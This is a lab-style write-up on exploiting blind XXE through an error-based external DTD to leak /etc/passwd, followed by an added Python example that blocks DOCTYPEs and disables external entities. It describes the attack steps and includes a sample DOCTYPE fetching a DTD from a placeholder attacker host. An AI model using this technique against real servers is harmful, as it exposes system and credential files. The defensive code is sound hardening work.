Blind XXE to LFI
Last updated
An alternative approach to exploiting a blind XXE is to trigger an XML parsing error. This is effective when the error message, which carries the sensitive data, is shown in the application's response.
We can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD that does the following:
Creates an XML parameter entity called file, which contains the contents of /etc/passwd.
Creates an XML parameter entity called eval, which dynamically defines another entity called error. The error entity will be evaluated by loading a non-existent file whose name contains the value of the file entity.
Uses the eval entity, which causes the error entity to be defined.
Uses the error entity, so the parser attempts to load the non-existent file.
This results in an error message containing the name of the non-existent file, which reveals the contents of /etc/passwd.
Create the malicious DTD, host it on your exploit server and save it.
Now insert an XML statement invoking the external DTD as usual.
We notice that the response gives us the contents of /etc/passwd.
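The whole technique above depends on the server-side parser accepting a DOCTYPE and resolving parameter entities from an external DTD. The following added example (not part of the original write-up) shows the defender's side in Python's standard library: a pre-parse check that refuses any DOCTYPE, and an expat-based SAX parser with external general and parameter entity resolution switched off. The two sample documents are constructed for the example; the DTD host name is a placeholder, and the element names are assumptions.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed sample documents (not from the write-up). The first has the shape the
# write-up describes: a DOCTYPE that pulls a DTD from an attacker-controlled host.
# The host name is a placeholder.
DOC_WITH_EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE stockCheck SYSTEM "http://attacker.invalid/malicious.dtd">
<stockCheck><productId>1</productId></stockCheck>"""

# Ordinary request body with no DTD at all.
DOC_BENIGN = b"""<?xml version="1.0"?>
<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>"""

_DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)


def declares_doctype(doc: bytes) -> bool:
    """Cheap pre-parse check. Both the external DTD and the parameter entities the
    write-up relies on need a DOCTYPE, so an API that never legitimately accepts one
    can reject the whole class of payloads before the parser ever sees them."""
    return _DOCTYPE_RE.search(doc) is not None


class _ElementCollector(ContentHandler):
    """Records element names so the caller can see what was actually parsed."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def startElement(self, name, attrs):
        self.elements.append(name)


def parse_hardened(doc: bytes) -> list:
    """Parse untrusted XML with DTDs refused and external entity resolution disabled.
    Returns the element names in document order; raises ValueError on a DOCTYPE."""
    if declares_doctype(doc):
        raise ValueError("DOCTYPE declarations are not accepted")
    parser = xml.sax.make_parser()
    # Belt and braces: even if a DOCTYPE slipped past the check, the expat-based
    # reader must not fetch external general or parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = _ElementCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(doc))
    return collector.elements


def rejects(doc: bytes) -> bool:
    """True when the hardened parser refuses the document (useful for a log line)."""
    try:
        parse_hardened(doc)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, doc in (("benign", DOC_BENIGN), ("external-dtd", DOC_WITH_EXTERNAL_DTD)):
        print(label, "rejected" if rejects(doc) else "parsed")
```

Rejecting DOCTYPE outright is the simplest policy for an API that only ever receives plain element data; if a schema genuinely needs an internal DTD, keep the two `setFeature` calls and log every DOCTYPE seen, since a DOCTYPE with a SYSTEM identifier pointing at an external host is the request shape this write-up relies on.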